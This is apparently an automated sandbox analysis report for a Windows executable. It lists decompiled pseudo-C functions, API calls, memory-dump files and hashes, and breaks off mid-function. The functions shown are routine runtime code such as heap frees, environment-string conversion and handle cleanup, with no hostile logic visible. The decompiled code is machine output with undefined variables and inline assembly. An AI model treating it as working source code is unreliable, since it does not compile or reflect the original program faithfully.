          0x0020c2f2
          0x00000000
          0x0020c2f2
          0x0020c2e9
          0x0020c2ef
          0x00000000
          0x0020c2ef
          0x00000000

          APIs
            • Part of subcall function 001F12D7: GetDlgItem.USER32(00000000,00003021), ref: 001F131B
            • Part of subcall function 001F12D7: SetWindowTextW.USER32(00000000,002222E4), ref: 001F1331
          • EndDialog.USER32(?,00000001), ref: 0020C2F2
          • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0020C308
          • SetDlgItemTextW.USER32(?,00000066,?), ref: 0020C322
          • SetDlgItemTextW.USER32(?,00000068), ref: 0020C32D
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ItemText$DialogWindow
          • String ID: RENAMEDLG
          • API String ID: 445417207-3299779563
          • Opcode ID: 11c2f4d1f09cdf4b1d07aa426f0d2be92d6403e54925941614a9ea34890f321b
          • Instruction ID: 4e2e9435ff3a4cde72ba600480741ed8beab696c7c9ef792248269d56916d338
          • Opcode Fuzzy Hash: 11c2f4d1f09cdf4b1d07aa426f0d2be92d6403e54925941614a9ea34890f321b
          • Instruction Fuzzy Hash: 0F01F5726603257BD3205FE46E48F377B6CE75AB00F204115F601B64D1C2D26C219765
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00216B78, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
          Download Yara Rule
          C-Code - Quality: 37%
          			E00216B78(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				intOrPtr* _t20;
				signed int _t22;

				_t10 =  *0x22d668; // 0x4319796a
				_v8 = _t10 ^ _t22;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t20 = GetProcAddress(_v12, "CorExitProcess");
					if(_t20 != 0) {
						 *0x222260(_a4);
						_t12 =  *_t20();
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				return E0020E203(_t12, _v8 ^ _t22);
			}








          0x00216b7f
          0x00216b86
          0x00216b89
          0x00216b8d
          0x00216b98
          0x00216ba0
          0x00216bb1
          0x00216bb5
          0x00216bbc
          0x00216bc2
          0x00216bc2
          0x00216bc4
          0x00216bc9
          0x00216bce
          0x00216bce
          0x00216be1

          APIs
          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00216B29,?,?,00216AC9,?,0022A800,0000000C,00216C20,?,00000002), ref: 00216B98
          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00216BAB
          • FreeLibrary.KERNEL32(00000000,?,?,?,00216B29,?,?,00216AC9,?,0022A800,0000000C,00216C20,?,00000002,00000000), ref: 00216BCE
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AddressFreeHandleLibraryModuleProc
          • String ID: CorExitProcess$mscoree.dll
          • API String ID: 4061214504-1276376045
          • Opcode ID: 9b68b5f997bf52ceb7233aa0ece63e7202a7e508878509b531a619df8ea7543f
          • Instruction ID: 91d7cc8abb43fe89702fc825e5b3d94f8cbe8adf62d75c6b91c2ad677440b555
          • Opcode Fuzzy Hash: 9b68b5f997bf52ceb7233aa0ece63e7202a7e508878509b531a619df8ea7543f
          • Instruction Fuzzy Hash: 59F03131A1521DFBCB259FD4EC0DFEEBBB9EB04715F400055E809A2190DB754B95CA90
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001FE7E3, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E001FE7E3(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E001FFCFD(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}






          0x001fe7e4
          0x001fe7ea
          0x001fe7f1
          0x001fe7f6
          0x001fe7fa
          0x001fe80f
          0x001fe812
          0x001fe818
          0x001fe818
          0x001fe81b
          0x00000000
          0x001fe81b
          0x001fe820

          APIs
            • Part of subcall function 001FFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001FFD18
            • Part of subcall function 001FFCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001FE7F6,Crypt32.dll,?,001FE878,?,001FE85C,?,?,?,?), ref: 001FFD3A
          • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 001FE802
          • GetProcAddress.KERNEL32(00237350,CryptUnprotectMemory), ref: 001FE812
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AddressProc$DirectoryLibraryLoadSystem
          • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
          • API String ID: 2141747552-1753850145
          • Opcode ID: bd8b3607bc60323b845a661ab0ef09b3e8e3987f235f4f87d7319ad0c5520728
          • Instruction ID: ee6ee16b3d85d97b0aa0ace79000806853494fabe55b16c38a252317c35021fa
          • Opcode Fuzzy Hash: bd8b3607bc60323b845a661ab0ef09b3e8e3987f235f4f87d7319ad0c5520728
          • Instruction Fuzzy Hash: D8E04FB1511657FACB106BB4A80CA21FBA86F25700B10D125A514D3561DBB5D069CB60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00217389, Relevance: 7.6, APIs: 5, Instructions: 129COMMON
          Download Yara Rule
          C-Code - Quality: 83%
          			E00217389(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x22d668; // 0x4319796a
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E002169A8( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E0020DB10(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E0020DB10(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E0020DB10(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E0021AC29(_t56);
						_t40 = E00217A50(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E0021AC29(_t56);
						E00217A50(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x22d668;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























          0x00217389
          0x00217393
          0x00217397
          0x00217399
          0x0021739d
          0x002173a7
          0x002173b8
          0x002173bd
          0x002173bf
          0x002173c1
          0x002173c3
          0x002173c5
          0x002173c9
          0x00217483
          0x00217491
          0x00217493
          0x00217498
          0x0021749f
          0x002174a1
          0x002174af
          0x002174be
          0x002174c1
          0x002174c3
          0x00000000
          0x002174c4
          0x002173d1
          0x002173d6
          0x002173db
          0x002173dd
          0x002173dd
          0x002173df
          0x002173e4
          0x002173e8
          0x002173e8
          0x002173eb
          0x0021740a
          0x0021740a
          0x0021740c
          0x0021740f
          0x00217418
          0x0021741b
          0x00217420
          0x00217423
          0x00217428
          0x00000000
          0x00000000
          0x0021742a
          0x00000000
          0x002173ed
          0x002173ed
          0x002173ef
          0x002173f8
          0x002173fb
          0x00217400
          0x00217403
          0x00217408
          0x00217432
          0x00217435
          0x00217437
          0x0021743a
          0x00217442
          0x00217448
          0x0021744f
          0x00217451
          0x00217459
          0x00217468
          0x0021746c
          0x0021746e
          0x00217471
          0x00000000
          0x00000000
          0x00217473
          0x00217476
          0x00217478
          0x00217478
          0x00217479
          0x0021747b
          0x0021747e
          0x00000000
          0x00217478
          0x00000000
          0x00217408
          0x002173eb
          0x00000000

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _free
          • String ID:
          • API String ID: 269201875-0
          • Opcode ID: 206427411ce61761d8df9133d102baeedf9989bbfa6f6e84ad131d956acc1f0a
          • Instruction ID: d63356651f569ee7022e3079b01d9c02960a926bee63514e6b74ef3a1cb6106d
          • Opcode Fuzzy Hash: 206427411ce61761d8df9133d102baeedf9989bbfa6f6e84ad131d956acc1f0a
          • Instruction Fuzzy Hash: F5410436A103049FCB20DFB8C881A9EB7F5EF98714F1545A9E515EB381D731AD51CB80
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0021ABA6, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
          Download Yara Rule
          C-Code - Quality: 93%
          			E0021ABA6() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E0021AB6F(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00217A8A(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00217A50(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












          0x0021abb5
          0x0021abbb
          0x0021ac13
          0x0021ac13
          0x0021abbd
          0x0021abbe
          0x0021abc3
          0x0021abcc
          0x0021abd2
          0x0021abd8
          0x0021abdd
          0x00000000
          0x0021abdf
          0x0021abe5
          0x0021abea
          0x0021ac08
          0x0021ac02
          0x0021ac02
          0x0021ac04
          0x0021ac04
          0x0021ac0b
          0x0021ac10
          0x0021abdd
          0x0021ac17
          0x0021ac1a
          0x0021ac1a
          0x0021ac28

          APIs
          • GetEnvironmentStringsW.KERNEL32 ref: 0021ABAF
          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0021ABD2
            • Part of subcall function 00217A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00212FA6,?,0000015D,?,?,?,?,00214482,000000FF,00000000,?,?), ref: 00217ABC
          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0021ABF8
          • _free.LIBCMT ref: 0021AC0B
          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0021AC1A
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
          • String ID:
          • API String ID: 336800556-0
          • Opcode ID: ea9d9a26d07311e80cd3f0d7678c7892c671bbde91695da901a588ef13d0a554
          • Instruction ID: 412bfc9b95f5e03caa5c8f34094f57114b7934eaba4b41a1949244631f00f4f1
          • Opcode Fuzzy Hash: ea9d9a26d07311e80cd3f0d7678c7892c671bbde91695da901a588ef13d0a554
          • Instruction Fuzzy Hash: D5018872622615BF23311ABA6C4DCFF79EDDED6B60315022AFD04D2141DA618D9285F1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0021859A, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
          Download Yara Rule
          C-Code - Quality: 82%
          			E0021859A(void* __ecx, void* __edx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0x22d6ac; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E00217B1B(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E00219BA9(_t13, _t17, __eflags,  *0x22d6ac, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E00218388(_t13, _t16, 0x250418);
							E00217A50(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00217A50();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E00219B53(_t11, _t17, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}











          0x0021859a
          0x002185a5
          0x002185a7
          0x002185a9
          0x002185ae
          0x002185b1
          0x002185bf
          0x002185cb
          0x002185ce
          0x002185d1
          0x002185e3
          0x002185e8
          0x002185ea
          0x002185f5
          0x002185fb
          0x00218603
          0x00218605
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x002185ec
          0x002185ec
          0x00000000
          0x002185ec
          0x002185d3
          0x002185d3
          0x002185d4
          0x002185d4
          0x00218607
          0x00218608
          0x00218608
          0x002185b3
          0x002185b9
          0x002185bd
          0x00218610
          0x00218611
          0x00218617
          0x00000000
          0x00000000
          0x00000000
          0x002185bd
          0x0021861e

          APIs
          • GetLastError.KERNEL32(?,?,?,00217ED1,00217B6D,?,00218544,00000001,00000364,?,00212E0F,?,?,002300E0), ref: 0021859F
          • _free.LIBCMT ref: 002185D4
          • _free.LIBCMT ref: 002185FB
          • SetLastError.KERNEL32(00000000,?,002300E0), ref: 00218608
          • SetLastError.KERNEL32(00000000,?,002300E0), ref: 00218611
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ErrorLast$_free
          • String ID:
          • API String ID: 3170660625-0
          • Opcode ID: ef3f9f9bfef2184f78a92beab7e498a0b63e32d11f7b385f4fec937156c800aa
          • Instruction ID: 2a19f8aa075ee5f2f301f732b333c593d26f210c117ee0b62f14ce89b3005368
          • Opcode Fuzzy Hash: ef3f9f9bfef2184f78a92beab7e498a0b63e32d11f7b385f4fec937156c800aa
          • Instruction Fuzzy Hash: 150126362786017AD3226A707CC99FB25EECBF13657220124F80592142EE628EF24424
          Uniqueness

          Uniqueness Score: -1.00%

          Function 002003C7, Relevance: 7.5, APIs: 5, Instructions: 44COMMON
          Download Yara Rule
          C-Code - Quality: 82%
          			E002003C7(void* __ecx) {
				intOrPtr _v16;
				void* __ebp;
				int _t16;
				void** _t21;
				long* _t25;
				void* _t28;
				void* _t30;
				intOrPtr _t31;

				_t22 = __ecx;
				_push(0xffffffff);
				_push(E00221161);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_t28 = __ecx;
				E00200697(__ecx);
				_t25 = 0;
				 *((char*)(__ecx + 0x314)) = 1;
				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
					_t21 = _t28 + 4;
					do {
						E002004BA(_t22, _t30,  *_t21);
						CloseHandle( *_t21);
						_t25 = _t25 + 1;
						_t21 =  &(_t21[1]);
					} while (_t25 <  *((intOrPtr*)(_t28 + 0x104)));
				}
				DeleteCriticalSection(_t28 + 0x320);
				CloseHandle( *(_t28 + 0x318));
				_t16 = CloseHandle( *(_t28 + 0x31c));
				 *[fs:0x0] = _v16;
				return _t16;
			}











          0x002003c7
          0x002003d0
          0x002003d2
          0x002003d7
          0x002003d8
          0x002003e2
          0x002003e4
          0x002003e9
          0x002003eb
          0x002003fb
          0x00200407
          0x00200409
          0x0020040c
          0x0020040e
          0x00200415
          0x0020041b
          0x0020041c
          0x0020041f
          0x0020040c
          0x0020042e
          0x0020043a
          0x00200446
          0x00200451
          0x0020045c

          APIs
            • Part of subcall function 00200697: ResetEvent.KERNEL32(?), ref: 002006A9
            • Part of subcall function 00200697: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 002006BD
          • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 002003FB
          • CloseHandle.KERNEL32(?,?), ref: 00200415
          • DeleteCriticalSection.KERNEL32(?), ref: 0020042E
          • CloseHandle.KERNEL32(?), ref: 0020043A
          • CloseHandle.KERNEL32(?), ref: 00200446
            • Part of subcall function 002004BA: WaitForSingleObject.KERNEL32(?,000000FF,002005D9,?,?,0020064E,?,?,?,?,?,00200638), ref: 002004C0
            • Part of subcall function 002004BA: GetLastError.KERNEL32(?,?,0020064E,?,?,?,?,?,00200638), ref: 002004CC
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
          • String ID:
          • API String ID: 1868215902-0
          • Opcode ID: 9300ef61d3ea8a84d2eeb4c12064689860fd83452193b3fdc201d0da6777b5ec
          • Instruction ID: 6ce65edc2cd79f521261d157d52851b92fd949c81bc184859852b2324572fcd8
          • Opcode Fuzzy Hash: 9300ef61d3ea8a84d2eeb4c12064689860fd83452193b3fdc201d0da6777b5ec
          • Instruction Fuzzy Hash: 2F01F532410704FBD7319FA4EC88FC6BBEDFB58710F400519F25A821A0C7762A59CB94
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0021B461, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E0021B461(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x22dd50; // 0x22dd44
					if(_t23 != 0) {
						E00217A50(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x22dd54; // 0x25088c
					if(_t24 != 0) {
						E00217A50(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x22dd58; // 0x25088c
					if(_t25 != 0) {
						E00217A50(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x22dd80; // 0x22dd48
					if(_t26 != 0) {
						E00217A50(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x22dd84; // 0x250890
					if(_t27 != 0) {
						return E00217A50(_t6);
					}
				}
				return _t6;
			}










          0x0021b467
          0x0021b46c
          0x0021b470
          0x0021b476
          0x0021b479
          0x0021b47e
          0x0021b482
          0x0021b488
          0x0021b48b
          0x0021b490
          0x0021b494
          0x0021b49a
          0x0021b49d
          0x0021b4a2
          0x0021b4a6
          0x0021b4ac
          0x0021b4af
          0x0021b4b4
          0x0021b4b5
          0x0021b4b8
          0x0021b4be
          0x00000000
          0x0021b4c6
          0x0021b4be
          0x0021b4c9

          APIs
          • _free.LIBCMT ref: 0021B479
            • Part of subcall function 00217A50: RtlFreeHeap.NTDLL(00000000,00000000,?,0021B4F8,?,00000000,?,00000000,?,0021B51F,?,00000007,?,?,0021B91C,?), ref: 00217A66
            • Part of subcall function 00217A50: GetLastError.KERNEL32(?,?,0021B4F8,?,00000000,?,00000000,?,0021B51F,?,00000007,?,?,0021B91C,?,?), ref: 00217A78
          • _free.LIBCMT ref: 0021B48B
          • _free.LIBCMT ref: 0021B49D
          • _free.LIBCMT ref: 0021B4AF
          • _free.LIBCMT ref: 0021B4C1
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _free$ErrorFreeHeapLast
          • String ID:
          • API String ID: 776569668-0
          • Opcode ID: 0fafafece491739adf53b8663a2919f83bc3bb77dbb05d9c9d62e085ebc2a02b
          • Instruction ID: 3cbf54d6aa530561f6d4e3f697b071e10d73ce6e5485b724d1efa840b924edd4
          • Opcode Fuzzy Hash: 0fafafece491739adf53b8663a2919f83bc3bb77dbb05d9c9d62e085ebc2a02b
          • Instruction Fuzzy Hash: E0F06233564600BBC631EFB4F889C9A73F9AE60710B649805F04DE7511C730FCD18A64
          Uniqueness

          Uniqueness Score: -1.00%

          Function 002175DB, Relevance: 7.5, APIs: 5, Instructions: 30COMMON
          Download Yara Rule
          C-Code - Quality: 91%
          			E002175DB(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x22dd40; // 0xdb22b0
					if(_t7 != 0x22db20) {
						E00217A50(_t7);
						 *0x22dd40 = 0x22db20;
					}
				}
				E00217A50( *0x250410);
				 *0x250410 = 0;
				E00217A50( *0x250414);
				 *0x250414 = 0;
				E00217A50( *0x250860);
				 *0x250860 = 0;
				E00217A50( *0x250864);
				 *0x250864 = 0;
				return 1;
			}




          0x002175e4
          0x002175e8
          0x002175ea
          0x002175f6
          0x002175f9
          0x002175ff
          0x002175ff
          0x002175f6
          0x0021760b
          0x00217618
          0x0021761e
          0x00217629
          0x0021762f
          0x0021763a
          0x00217640
          0x00217648
          0x00217651

          APIs
          • _free.LIBCMT ref: 002175F9
            • Part of subcall function 00217A50: RtlFreeHeap.NTDLL(00000000,00000000,?,0021B4F8,?,00000000,?,00000000,?,0021B51F,?,00000007,?,?,0021B91C,?), ref: 00217A66
            • Part of subcall function 00217A50: GetLastError.KERNEL32(?,?,0021B4F8,?,00000000,?,00000000,?,0021B51F,?,00000007,?,?,0021B91C,?,?), ref: 00217A78
          • _free.LIBCMT ref: 0021760B
          • _free.LIBCMT ref: 0021761E
          • _free.LIBCMT ref: 0021762F
          • _free.LIBCMT ref: 00217640
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _free$ErrorFreeHeapLast
          • String ID:
          • API String ID: 776569668-0
          • Opcode ID: ca72eed4e23eba47e29d6caaab6f84819d2193f6ec13c4dc69092e91c19df078
          • Instruction ID: a4b6e17eb63020ad62f965bab7fe7894485ff5f3f8c8f8633c7052397666a7e9
          • Opcode Fuzzy Hash: ca72eed4e23eba47e29d6caaab6f84819d2193f6ec13c4dc69092e91c19df078
          • Instruction Fuzzy Hash: 5CF05E718287289B8612AF78BC8D99E3BF4BBA47157162116F51166372C7301AA18FCD
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00216C73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
          Download Yara Rule
          C-Code - Quality: 88%
          			E00216C73(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
